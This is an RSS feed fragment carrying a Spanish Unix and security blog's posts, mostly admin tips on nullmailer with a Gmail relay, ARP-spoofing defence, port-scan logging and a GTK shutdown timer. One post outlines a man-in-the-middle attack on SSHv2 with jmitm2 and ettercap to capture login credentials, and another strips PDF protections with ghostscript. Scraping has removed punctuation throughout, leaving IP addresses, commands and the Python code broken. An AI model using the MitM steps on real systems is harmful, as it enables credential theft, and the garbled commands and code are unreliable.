</description><link>http://www.secuobs.com/revue/news/260144.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/260144.shtml</guid></item>
<item><title>Implementacion y administracion de nullmailer como MTA simple</title><description>Secuobs.com : 2010-10-27 02:19:26 -  Unix   Cisco   Hacks  - Archivos de configuracion  vlan7 sid7  cat  etc xinetdd gmail-smtp  default  on  description  Gmail SMTP wrapper for clients without SSL support  vlan7 26-10-2010  Based on    Added logging capabilities   one minor fix thanks to this guide  http wwwlinuxfocusorg English November2000 article175shtml service gmail-smtp  disable   no  bind commented Only 1 NIC on this box Use only_from  bind   localhost only_from   localhost port   10025 socket_type   stream protocol   tcp wait   no user   root server    usr bin gmail-smtp type   unlisted  banner breaks communication   banner    etc issue log_on_failure   USERID vlan7 sid7  sudo cat  usr bin gmail-smtp bin sh usr bin openssl s_client -connect smtpgmailcom 465 -quiet 2 dev nullvlan7 sid7  cat  etc nullmailer remotes127001 smtp --port 10025 --user XXXYYY gmailcom --pass  Atencion  El archivo  etc nullmailer remotes es legible para todo el mundo  Asi que ojo   Comprobamos la conectividad con netcat  vlan7 sid7  nc -vv 127001 10025localhost  127001  10025   open220 mxgooglecom ESMTP b30sm7257373wbb22HELP214 200 http wwwgooglecom search btnI q RFC 2821 b30sm7257373wbb22QUIT221 200 closing connection b30sm7257373wbb22 sent 10, rcvd 168vlan7 sid7  xinetd OK Probemos a enviarnos un mensaje, a ver si nullmailer lo manda OK desde localhost autenticandose contra la cuenta gmail definida en  etc nullmailer remotes y reeenviandolo a XXX vlan7org root sid7 home vlan7  echo 'Esto es un mensaje de test' mailx XXX vlan7org Vemos la cola de correo  root sid7 home vlan7  mailq2010-10-26 23 55 03 330 bytes from to Forzamos un flush de la cola  root sid7 home vlan7  nullmailer-sendRescanning queue  C Comprobamos que la cola ha sido procesada y el correspondiente log de syslog  root sid7 home vlan7  mailqroot sid7 home vlan7  tail -f  var log syslogOct 26 23 56 09 sid7 xinetd 2208  removing timeOct 26 23 56 09 sid7 xinetd 2208  removing timeOct 26 23 56 09 sid7 xinetd 2208  Swapping defaultsOct 26 23 56 09 sid7 xinetd 2208  readjusting service gmail-smtpOct 26 23 56 09 sid7 xinetd 2208  Reconfigured  new 0 old 1 dropped 0  services Oct 26 23 57 03 sid7 nullmailer 2087  Rescanning queueOct 26 23 57 03 sid7 nullmailer 2087  Starting delivery  protocol  smtp host  127001 file  128813010319982Oct 26 23 57 05 sid7 nullmailer 20012  smtp  Succeeded  250 200 OK 1288130224 f31sm5425073wej15Oct 26 23 57 05 sid7 nullmailer 2087  Sent fileOct 26 23 57 05 sid7 nullmailer 2087  Delivery complete, 0 message s  remain C Segun syslog se ha mandado OK Como ultima comprobacion entramos en nuestro correo y ahi lo tenemos Todo OK Suerte,  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/260110.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/260110.shtml</guid></item>
<item><title>Enviar un mail desde la shell usando nuestra cuenta gmail como relay</title><description>Secuobs.com : 2010-10-27 02:19:26 -  Unix   Cisco   Hacks  - vlan7 sid7  perl -MMIME Base64 -e 'print encode_base64 000XXXYYY gmailcom password 'AFhYWC5ZWVlAZ21haWwuY29tcGFzc3dvcmQ vlan7 sid7   usr bin openssl s_client -crlf -connect smtpgmailcom 465CONNECTED 00000003 depth 1  C US O Google Inc CN Google Internet Authorityverify error num 20 unable to get local issuer certificateverify return 0---Certificate chain 0 s C US ST California L Mountain View O Google Inc CN smtpgmailcom i C US O Google Inc CN Google Internet Authority 1 s C US O Google Inc CN Google Internet Authority i C US O Equifax OU Equifax Secure Certificate Authority---Server certificate-----BEGIN CERTIFICATE-----MIIDWzCCAsSgAwIBAgIKFMs0nQADAAASjjANBgkqhkiG9w0BAQUFADBGMQswCQYDVQQGEwJVUzETMBEGA1UEChMKR29vZ2xlIEluYzEiMCAGA1UEAxMZR29vZ2xlIEludGVybmV0IEF1dGhvcml0eTAeFw0xMDA0MjIyMDAyNDVaFw0xMTA0MjIyMDEyNDVaMGgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMRYwFAYDVQQHEw1Nb3VudGFpbiBWaWV3MRMwEQYDVQQKEwpHb29nbGUgSW5jMRcwFQYDVQQDEw5zbXRwLmdtYWlsLmNvbTCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAz4B46NG2l4BkDdccddAuuOssQ4ZxCHoyj ErdlEqZurVCoGQzAkhZTkzHrmIgYmM6roTbkF zEaa2ROe9s4VoL4OgUnoyB0u1KbwrG5PHBbsMdk0r6jMmhh MORFVYgQrFxJnu8GnHiGW4QhmKVytu0FclYE F1gOOx5qIgTVCMCAwEAAaOCASwwggEoMB0GA1UdDgQWBBS1 KKmwdxtkpKkJgvwhZztqe0uszAfBgNVHSMEGDAWgBS wDDr9UMRPme6npH7 Gra42sSJDBbBgNVHR8EVDBSMFCgTqBMhkpodHRwOi8vd3d3LmdzdGF0aWMuY29tL0dvb2dsZUludGVybmV0QXV0aG9yaXR5L0dvb2dsZUludGVybmV0QXV0aG9yaXR5LmNybDBmBggrBgEFBQcBAQRaMFgwVgYIKwYBBQUHMAKGSmh0dHA6Ly93d3cuZ3N0YXRpYy5jb20vR29vZ2xlSW50ZXJuZXRBdXRob3JpdHkvR29vZ2xlSW50ZXJuZXRBdXRob3JpdHkuY3J0MCEGCSsGAQQBgjcUAgQUHhIAVwBlAGIAUwBlAHIAdgBlAHIwDQYJKoZIhvcNAQEFBQADgYEAUc39Y22ucA2N4mmDdPMC8DKbrRGlGMpC294mfh3yCkJaYRWjodFQSgCtFyKhTZ9roFpSEL0D4QxAtLSwtC0bSaSVusfAW3 CFgG Cya724ic9UoEosoG8CK eGoGQuEsZ0xR86J5jOs2H 4QPHFCn594V7ZySzdeQi93YV31RBE -----END CERTIFICATE-----subject C US ST California L Mountain View O Google Inc CN smtpgmailcomissuer C US O Google Inc CN Google Internet Authority---No client certificate CA names sent---SSL handshake has read 1711 bytes and written 303 bytes---New, TLSv1 SSLv3, Cipher is RC4-MD5Server public key is 1024 bitSecure Renegotiation IS supportedCompression  NONEExpansion  NONESSL-Session  Protocol   TLSv1 Cipher   RC4-MD5 Session-ID  6B1A39E3D377B24D4A123D2E5AE320A9E21DC976131C5FEB8E7318E74CA5E573 Session-ID-ctx  Master-Key  FF0082173AEA36C9CB330B63DC9503F7D0031FD60203056C926A98B08B1DBAE517B8417A3958E8A5E0E9C3376D36D49F Key-Arg   None Start Time  1288131594 Timeout   300  sec  Verify return code  20  unable to get local issuer certificate ---220 mxgooglecom ESMTP o43sm5440941weq23ehlo vlan7250-mxgooglecom at your service,  XYZA 250-SIZE 35651584250-8BITMIME250-AUTH LOGIN PLAIN XOAUTH250 ENHANCEDSTATUSCODESAUTH PLAIN AFhYWC5ZWVlAZ21haWwuY29tcGFzc3dvcmQ 235 270 Acceptedmail from  250 210 OK o43sm5440941weq23rcpt to  250 215 OK o43sm5440941weq23data354 Go ahead o43sm5440941weq23From  vlan7 To  vlan7 Subject  this is a test  hola vlan7, como estas 250 200 OK 1288131795 o43sm5440941weq23quit221 200 closing connection o43sm5440941weq23read errno 0vlan7 sid7  Comprobamos desde la shell el correo no leido de gmail  vlan7 sid7  curl -u ZZZ vlan7org --silent  https mailgooglecom mail feed atom  perl -ne 'print  t  if   print  2 n  if   'Enter host password for user 'ZZZ vlan7org' Gmail - Inbox for ZZZ vlan7orgthis is a test  vlan7  cut  Como podemos observar ahi lo tenemos   Suerte,  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/260109.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/260109.shtml</guid></item>
<item><title>Proteccion contra arp-spoofing</title><description>Secuobs.com : 2010-10-25 22:53:31 -  Unix   Cisco   Hacks  - Un pequeño log donde intervienen arp estaticas y su monitorizacion con arpon, una buena herramienta para la proteccion de spoofing root sid7 home vlan7  cat  etc network interfaces  This file describes the network interfaces available on your system  and how to activate them For more information, see interfaces 5    The loopback network interfaceauto loiface lo inet loopback   The primary network interfaceallow-hotplug eth0iface eth0 inet static address 1921680104 netmask 2552552550 network 19216800 broadcast 1921680255 next-hop zeroshell gateway 19216801 pre-up  etc network interfaces_sec post-up  usr sbin arp -f  etc sarpconf   dns-  options are implemented by the resolvconf package, if installed dns-nameservers 8888root sid7 home vlan7  cat  etc resolvconfnameserver 8888root sid7 home vlan7  netstat -nrKernel IP routing tableDestination Gateway Genmask Flags MSS Window irtt Iface19216800 0000 2552552550 U 0 0 0 eth00000 19216801 0000 UG 0 0 0 eth0root sid7 home vlan7  arp -a   19216801  at AA BB CC DD EE FF  ether  PERM on eth0root sid7 home vlan7   etc initd arpon statusChecking status of anti ARP poisoning daemon  arpon runningroot sid7 home vlan7  cat  etc sarpconf 19216801 AA BB CC DD EE FFroot sid7 home vlan7  cat  etc arponsarpi   Example of arponsarpi  19216801 00 26 5A C2 BA 31  zeroshellroot sid7 home vlan7  cat  var log arpon arponlog 08 14 37 - Wait link connection on eth0 08 14 39 - SARPI on dev eth0  inet 1921680117  hw 0 1f d0 59 57 1  08 14 39 - Protects these Arp Cache's entries  08 14 39 - 1  19216801 - AA BB CC DD EE FF 08 14 39 - Arp Cache restore from  etc arponsarpi 08 14 39 - Arp Cache refresh timeout  10 minuts 08 14 39 - Realtime Protect actived  08 15 52 - Request  AA BB CC DD EE FF 08 15 52 - Reply  Send to 19216801 - AA BB CC DD EE FF  cut  08 24 39 - Refresh these Arp Cache entries  08 24 39 - 1  19216801 - AA BB CC DD EE FF  cut   IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/259774.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/259774.shtml</guid></item>
<item><title>La rutina diaria Ya nos han vuelto a hacer un escaneo de puertos</title><description>Secuobs.com : 2010-10-25 18:14:46 -  Unix   Cisco   Hacks  - Examinando el correo enviado a traves de nullmailer, hey no hay necesidad de montar un Postfix solo para enviar correo, aunque pase por inet nullmailer se autentica, contra gmail en este caso, de forma cifrada Yo soy la 1921680117 y soy escaneado por la 1921680101, fwlogwatch nos alerta de ello fwlogwatch ALERT  65 packet s  from 1921680101 Recibidos X Responder de XXXYYY gmailcom para ZZZ vlan7org fecha 25 de octubre de 2010 15 16 asunto fwlogwatch ALERT  65 packet s  from 1921680101 enviado por gmailcom firmado por gmailcom ocultar detalles 15 16  1 hora antes  fwlogwatch ALERT on sid7  65 packet s  from 1921680101 to 1921680117 65 paquetes enviados a nullmailer por el SW logcheck, que previamente habria recibido la alerta por fwlogwatch, una herramienta que a mi me funciona muy bien con Shorewall para examinar de un vistazo los logs importantes a nivel de seguridad No me gusta publicar MACs, asi que edito dejando solo una de las lineas, ya que despues las mostraremos con un log que nos explica a mas alto nivel, por asi decirlo, todos esos eventos de syslog a nivel kernel mediante el SW psad  port scan active detector  sid7v7XXXes 2010-10-25 16 02 System Events Recibidos X Responder de XXXYYY gmailcom para ZZZ vlan7org fecha 25 de octubre de 2010 16 02 asunto sid7v7XXXes 2010-10-25 16 02 System Events enviado por gmailcom firmado por gmailcom ocultar detalles 16 02  24 minutos antes  This email is sent by logcheck If you no longer wish to receive such mail, you can either deinstall the logcheck package or modify its configuration file  etc logcheck logcheckconf  System Events  - - - - - -  Oct 25 15 16 19 sid7 kernel   104761341511  Shorewall net2fw DROP IN eth0 OUT  MAC CUT  SRC 1921680101 DST 1921680117 LEN 40 TOS 0x00 PREC 0x00 TTL 127 ID 61700 PROTO TCP SPT 63436 DPT 10 WINDOW 8190 RES 0x00 SYN URGP 0  CUT  Oct 25 15 16 20 sid7 fwlogwatch  ALERT  65 attempts from 1921680101 Oct 25 15 16 38 sid7 psad  src  1921680101 signature match   POLICY HP JetDirect LCD commnication attempt   sid  568  tcp port  9100 Oct 25 15 16 38 sid7 psad  src  1921680101 signature match   MISC VNC communication attempt   sid  100202  tcp port  5900 Oct 25 15 16 38 sid7 psad  src  1921680101 signature match   MISC MS Terminal Server communication attempt   sid  100077  tcp port  3389 Oct 25 15 16 38 sid7 psad  src  1921680101 signature match   DOS MSDTC communication attempt   sid  1408  tcp port  3372 Oct 25 15 16 38 sid7 psad  src  1921680101 signature match   MISC Microsoft SQL Server communication attempt   sid  100205  tcp port  1433 Oct 25 15 16 38 sid7 psad  scan detected  1921680101 - 1921680117 tcp   10-10000  flags  SYN tcp pkts  68 DL  2 Todas las herramientas nombradas pueden encontrarse buscando las paginas oficiales en google, y las he podido testear en un sistema en desarrollo corriendo Debian sid Si alguien conoce alguna alternativa a estos paquetes open source se agradecen comentarios Suerte,  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/259705.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/259705.shtml</guid></item>
<item><title>Multimedia en la web con Flash</title><description>Secuobs.com : 2010-10-21 14:41:48 -  Unix   Cisco   Hacks  - Para audio me gusta emff  easy musicplayer for flash , el buffering es increiblemente rapido Lastima que el proyecto parezca abandonado Ultima actualizacion de 2006 creo recordar Para video Flowplayer es muy bueno Este proyecto sigue en activo a dia de hoy Software libre  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/258904.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/258904.shtml</guid></item>
<item><title>Adobe Flash player oficialmente disponible para x64</title><description>Secuobs.com : 2010-09-22 15:51:41 -  Unix   Cisco   Hacks  - En Septiembre de 2010 Adobe anuncio Flash Player  Square  A dia 17 de Septiembre es una release plenamente funcional En Debian x64 basta una simple linea de apt  Mas info aqui A ver cuando avanzan gnash   lightspark con las tarjetas ATI, que tan mal soporte tienen en linux   y puedo usar SW 100pourcents open-source  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/250659.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/250659.shtml</guid></item>
<item><title>Malware Prevention through Domain Blocking</title><description>Secuobs.com : 2010-09-22 15:51:41 -  Unix   Cisco   Hacks  - Existen servidores DNS que filtran por contenido y servidores DNS que filtran por seguridad A mi personalmente me interesan los ultimos Me preocupa la seguridad, pero no quiero censura de contenidos sin malware Yo recomiendo estas DNS  http wwwclearclouddnscom  Norton tiene otras, es cuestion de elegir Mas info aqui Suerte  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/250658.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/250658.shtml</guid></item>
<item><title>shutdown, reboot, hibernate or suspend after a given time</title><description>Secuobs.com : 2010-09-20 07:03:14 -  Unix   Cisco   Hacks  - Alternativa a pm-suspend, sin necesidad de ser root http wag-netch p 319  usr bin env python   - - coding  utf-8 - -     GTK GUI which executes shutdown, reboot, hibernate or suspend after a given time   DBus, UPower and ConsoleKit handles the stuff under the hood   If the methodes are allowed, no root access is required     Version  11   Requires  gnome-desktop 230     NOTE  UPower-Suspend Hibernate do not give a reply through dbus This programm   does ignore that, but if you try to suspend hibernate after a wake up   it takes about 20sec till the non existing reply gets recognized   TODO  Check if dbus requests are allowed  CanStop , CanRestart    Support older backends  Hal, DeviceKit-Power, SessionManager      Version History    10 - Initial Release   11 - Gnome-Desktop 230 fixes  UPower replaces DeviceKit-Power,   ConsoleKit replaces SessionManager     Copyright  C  2010 wag wag-netch     This program is free software  you can redistribute it and or modify   it under the terms of the GNU General Public License as published by   the Free Software Foundation, either version 3 of the License, or    at your option  any later version     This program is distributed in the hope that it will be useful,   but WITHOUT ANY WARRANTY  without even the implied warranty of   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE See the   GNU General Public License for more details     You should have received a copy of the GNU General Public License   along with this program If not, see  import gtk, gobject, dbus, dbusmainloopglib gobjectthreads_init  dbusmainloopglibDBusGMainLoop set_as_default True  class C_ShutdownLater  def __init__ self  selfloop   gobjectMainLoop  selfdo    shutdown  selfwin_conf  def win_conf self   Create configuration window  win   gtkWindow gtkWINDOW_TOPLEVEL  winconnect destroy , selfquit  winset_title ShutdownLater  winset_border_width 20    Box, Table vb_main   gtkVBox False, 0  winadd vb_main  t_rb   gtkTable 2, 2, False  winset_geometry_hints t_rb, min_width 200, min_height 70  t_rbset_row_spacings 5  t_rbset_col_spacings 5  f_rb   gtkFrame  Initiate     f_rbset_border_width 4  f_rbadd t_rb  vb_mainpack_start f_rb    RadioButtons rb_shutdown   gtkRadioButton None,  Shutdown  rb_shutdownset_border_width 5  rb_shutdownconnect toggled , selfrb_callback,  shutdown  t_rbattach rb_shutdown, 0, 1, 0, 1  rb_reboot   gtkRadioButton rb_shutdown,  Reboot  rb_rebootset_border_width 5  rb_rebootconnect toggled , selfrb_callback,  reboot  t_rbattach rb_reboot, 1, 2, 0, 1  rb_hibernate   gtkRadioButton rb_shutdown,  Hibernate  rb_hibernateset_border_width 5  rb_hibernateconnect toggled , selfrb_callback,  hibernate  t_rbattach rb_hibernate, 0, 1, 1, 2  rb_suspend   gtkRadioButton rb_shutdown,  Suspend  rb_suspendset_border_width 5  rb_suspendconnect toggled , selfrb_callback,  suspend  t_rbattach rb_suspend, 1, 2, 1, 2    Table, Labels t_sp   gtkTable 3, 2, False  t_spset_row_spacings 10  t_spset_col_spacings 10  f_sp   gtkFrame  After     f_spset_border_width 4  f_spadd t_sp  vb_mainpack_start f_sp  l_h   gtkLabel Hours  l_hset_padding 3, 3  t_spattach l_h, 0, 1, 0, 1  l_m   gtkLabel Minutes  t_spattach l_m, 1, 2, 0, 1  l_s   gtkLabel Seconds  t_spattach l_s, 2, 3, 0, 1    SpinBoxes sp_h_adj   gtkAdjustment 0, 0, 999, 1, 10, 0  selfsp_h   gtkSpinButton sp_h_adj, 1, 0  selfsp_hset_numeric True  selfsp_hset_size_request 50, 27  t_spattach selfsp_h, 0, 1, 1, 2, False  sp_m_adj   gtkAdjustment 0, 0, 59, 1, 10, 0  selfsp_m   gtkSpinButton sp_m_adj, 1, 0  selfsp_mset_numeric True  selfsp_mset_size_request 45, 27  t_spattach selfsp_m, 1, 2, 1, 2, False  sp_s_adj   gtkAdjustment 0, 0, 59, 1, 10, 0  selfsp_s   gtkSpinButton sp_s_adj, 1, 0  selfsp_sset_numeric True  selfsp_sset_size_request 45, 27  t_spattach selfsp_s, 2, 3, 1, 2, False    Table, Buttons t_b   gtkTable 2, 1, False  t_bset_row_spacings 10  t_bset_col_spacings 10  vb_mainpack_start t_b  b_start   gtkButton Start  b_startset_border_width 4  t_battach b_start, 0, 1, 0, 1  b_startconnect clicked , selfstart, win  b_quit   gtkButton  Quit   b_quitset_border_width 4  t_battach b_quit, 1, 2, 0, 1  b_quitconnect clicked , selfquit  winshow_all  gtkmain  def win_run self, main   Create running window  win_conf   main win   gtkWindow gtkWINDOW_TOPLEVEL  winconnect destroy , selfcancel, win_conf, win  winset_title ShutdownLater  winset_border_width 20    Box, ProgBar vb_main   gtkVBox False, 0  winadd vb_main  pb_adj   gtkAdjustment 1, 0, 1, 1, 5, 0  selfpb_time   gtkProgressBar pb_adj  selfpb_timeset_size_request 200, 30  af_pb   gtkFrame  pourcentss in     pourcents selfdocapitalize  af_pbset_border_width 4  af_pbadd selfpb_time  vb_mainpack_start af_pb    Table, Buttons t_b   gtkTable 2, 1, False  t_bset_row_spacings 10  t_bset_col_spacings 10  vb_mainpack_start t_b  b_pause   gtkToggleButton Pause  b_pauseset_border_width 4  t_battach b_pause, 0, 1, 0, 1  b_pauseconnect toggled , selfpause  b_cancel   gtkButton Cancel  b_cancelset_border_width 4  t_battach b_cancel, 1, 2, 0, 1  b_cancelconnect clicked , selfcancel, win_conf, win  winshow_all  def quit self, data None  selfloopquit  gtkmain_quit  def start self, widget, data   Start choosen process  win_conf   data   Get spinbutton values as int, calculate total and current time h   selfsp_hget_value_as_int  m   selfsp_mget_value_as_int  s   selfsp_sget_value_as_int  selft_total    h 3600 m 60 s selft_current    h 3600 m 60 s   Hide main window and show run window win_confhide  selfwin_run data  selftimer h, m, s  def rb_callback self, widget, data None   Set do variable from user input  if widgetget_active  selfdo   data def pause self, widget   Pause process    Kill or start timer if selft_current   0  if widgetget_active  gobjectsource_remove selfg_id  else  selfg_id   gobjecttimeout_add 1000, selfcount  def cancel self, widget, win_conf, win_run   Cancel process    Remove timer, destroy run window, show main window again gobjectsource_remove selfg_id  win_rundestroy  win_confshow  def timer self, h, m, s   Call counter every second  selfpb_timeset_text pourcents02i pourcents02i pourcents02i  pourcents  h, m, s  selfg_id   gobjecttimeout_add 1000, selfcount  def count self   Countdown and rewrite progressbar    Countdown, calculate and update if selft_current   0  selft_current -  1 pb_percent   float selft_current float selft_total  pb_h   selft_current 3600 pb_m   selft_currentpourcents3600 60 pb_s   selft_currentpourcents3600pourcents60 selfpb_timeset_fraction pb_percent  selfpb_timeset_text pourcents02i pourcents02i pourcents02i  pourcents  pb_h, pb_m, pb_s    Again, and again, and again return True else  selfinitiate  def initiate self   Send dbus messages    Shutdown with ConsoleKit if selfdo   'shutdown'  bus   dbusSystemBus  proxy   busget_object 'orgfreedesktopConsoleKit', ' org freedesktop ConsoleKit Manager'  iface   dbusInterface proxy, 'orgfreedesktopConsoleKitManager'  ifaceStop    Reboot with ConsoleKit elif selfdo   'reboot'  bus   dbusSystemBus  proxy   busget_object 'orgfreedesktopConsoleKit', ' org freedesktop ConsoleKit Manager'  iface   dbusInterface proxy, 'orgfreedesktopConsoleKitManager'  ifaceRestart    Hibernate with UPower elif selfdo   'hibernate'  bus   dbusSystemBus  proxy   busget_object 'orgfreedesktopUPower', ' org freedesktop UPower'  iface   dbusInterface proxy, 'orgfreedesktopUPower'  ifaceHibernate ignore_reply True    Suspend with UPower elif selfdo   'suspend'  bus   dbusSystemBus  proxy   busget_object 'orgfreedesktopUPower', ' org freedesktop UPower'  iface   dbusInterface proxy, 'orgfreedesktopUPower'  ifaceSuspend ignore_reply True  selflooprun  sdl   C_ShutdownLater   IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/249679.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/249679.shtml</guid></item>
<item><title>untar undo</title><description>Secuobs.com : 2010-09-20 07:03:14 -  Unix   Cisco   Hacks  - A veces extraemos un tar sin fijarnos si crea un directorio donde extrae todo, y la liamos gorda Una forma de eliminar todo lo extraido seria asi  tar tfz filenametgz xargs rm -Rf  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/249678.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/249678.shtml</guid></item>
<item><title>Taller de TCP IP</title><description>Secuobs.com : 2010-09-20 07:03:14 -  Unix   Cisco   Hacks  - Excelente PDF de Vic_Thor Podeis descargarlo de la direccion oficial de Wadalbertia Oldie but goodie Suerte,  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/249677.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/249677.shtml</guid></item>
<item><title>Capturar video con ffmpeg</title><description>Secuobs.com : 2010-09-20 07:03:14 -  Unix   Cisco   Hacks  -    ffmpeg -f x11grab -s  xdpyinfo grep dimensions awk ' print  2 '  -r 25 -i  who -m sed 's   1 '  -sameq  tmp outputmpg Free   CLI  Nice PD La grabacion se para con la tecla Q  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/249676.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/249676.shtml</guid></item>
<item><title>Jugando con FQL</title><description>Secuobs.com : 2010-09-20 07:03:14 -  Unix   Cisco   Hacks  -  Obtener clave API   clave secreta http wwwfacebookcom developers Crear nueva aplicacion Configuracion avanzada   Desktop  Instalar modulo perl WWW Facebook FQL sudo perl -MCPAN -e 'install WWW Facebook FQL'  script fqlpl use WWW Facebook FQL  my  fb   new WWW Facebook FQL key   'API_key', private   'Secret_key'   fb-login 'user', 'passwd'  print  fb-query ARGV 0   fb-logout   Una sentencia FQL sencilla Obtener nombre de uid 7 vlan7 micasa  perl fqlpl  Select name from user where uid 7   Obtener info de uid 7 vlan7 micasa  perl fqlpl  select uid, first_name, last_name, name, pic_small, pic_big , pic_square, pic, affiliations, profile_update_time, timezone, religion, birthday, birthday_date, sex, hometown_location, relationship_status, significant_other_id, political, current_location, interests, is_app_user, music, tv, books, about_me, education_history, work_history, notes_count , wall_count, status, is_app_user, online_presence, locale, proxied_email, profile_url, pic_small_with_logo, allowed_restrictions, profile_blurb, family from user where uid 7  Tablas disponibles AQUI Suerte,  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/249675.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/249675.shtml</guid></item>
<item><title>Y yo que creia que sabia javascript</title><description>Secuobs.com : 2010-09-20 07:03:14 -  Unix   Cisco   Hacks  -  Puedes crear arte y belleza con un ordenador  Original Version New and Improved Version No, esta demo de 1 KB en javascript parece no funcionar en IE Visto AQUI Enjoy   IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/249674.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/249674.shtml</guid></item>
<item><title>MitM contra sshv2 con jmitm2  sin downgrade a sshv1 </title><description>Secuobs.com : 2010-09-20 07:03:14 -  Unix   Cisco   Hacks  -  0  Escenario  sshd  Ubuntu 1004 x64   1921681100 Victima  BT4 Final   1921681101 Atacante  BT4-R1   1921681103  1  Atacante se baja jmitm2 y lo configura   2  Atacante inicia jmitm2 y hace ARP-spoof  bidireccional  con ettercap   3  Victima se conecta al server sshd y Atacante captura las credenciales sin cortar la comunicacion  MitM  Nota  El exito del ataque depende totalmente de que la victima acepte el WARNING de que las claves RSA han cambiado  evidente  Suerte,  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/249673.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/249673.shtml</guid></item>
<item><title>nautilus resize   rotate images</title><description>Secuobs.com : 2010-09-20 07:03:14 -  Unix   Cisco   Hacks  - 2 nuevas opciones en el menu de nautilus Una para redimensionar imagenes y otra para rotarlas Muy util si usamos Gnome sudo aptitude install nautilus-image-converter  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/249672.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/249672.shtml</guid></item>
<item><title>hack this site</title><description>Secuobs.com : 2010-09-20 07:03:14 -  Unix   Cisco   Hacks  - Un buen sitio donde practicar tus habilidades de hacking etico, pentesting o como querais llamarlo, de forma totalmente legal La URL es http wwwhackthissiteorg  Y este soy yo, un Wiseman por el momento, aunque yo deberia ser el eterno aprendiz   Fijaos que enlazo mi perfil ocultando el referer con una de las muchas paginas que existen que hacen este servicio De no hacerlo asi la web de HTS nos diria que somos un  bad referer  jeje Suerte,  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/249671.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/249671.shtml</guid></item>
<item><title>Taller WIFI por Vic_Thor</title><description>Secuobs.com : 2010-09-20 07:03:14 -  Unix   Cisco   Hacks  - Excelente, para variar  http wwwwadalbertiaorg foro viewtopicphp f 7 t 5589  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/249670.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/249670.shtml</guid></item>
<item><title>Desproteger un PDF</title><description>Secuobs.com : 2010-09-20 07:03:14 -  Unix   Cisco   Hacks  - Podemos eliminar todas las protecciones de un PDF con ghostscript gs -dNOPAUSE -dBATCH -sDEVICE pdfwrite -sOutputFile OUTPUTpdf -c setpdfwrite -f INPUTpdf  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/249669.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/249669.shtml</guid></item>
<item><title>Listar mails no leidos de gmail desde linea de comandos</title><description>Secuobs.com : 2010-09-20 07:03:14 -  Unix   Cisco   Hacks  -    curl -u USERNAME --silent  https mailgooglecom mail feed atom  perl -ne 'print  t  if   print  2 n  if   '  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/249668.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/249668.shtml</guid></item>
<item><title>Mostrar usuario, IP y fecha de intentos fallidos contra ssh</title><description>Secuobs.com : 2010-09-20 07:03:14 -  Unix   Cisco   Hacks  -    awk ' sshd     Failed   gsub invalid user ,  printf  pourcents-12s pourcents-16s pourcentss-pourcentss-pourcentss n ,  9,  11,  1,  2,  3 '  var log authlog Testeado en Ubuntu 1004 x64   bash Suerte,  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/249667.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/249667.shtml</guid></item>
<item><title>Descargar videos de youtube  III </title><description>Secuobs.com : 2010-09-20 07:03:14 -  Unix   Cisco   Hacks  - A dia de hoy este add-on para FF es el que mejor me funciona  IMAGE   IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/249666.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/249666.shtml</guid></item>
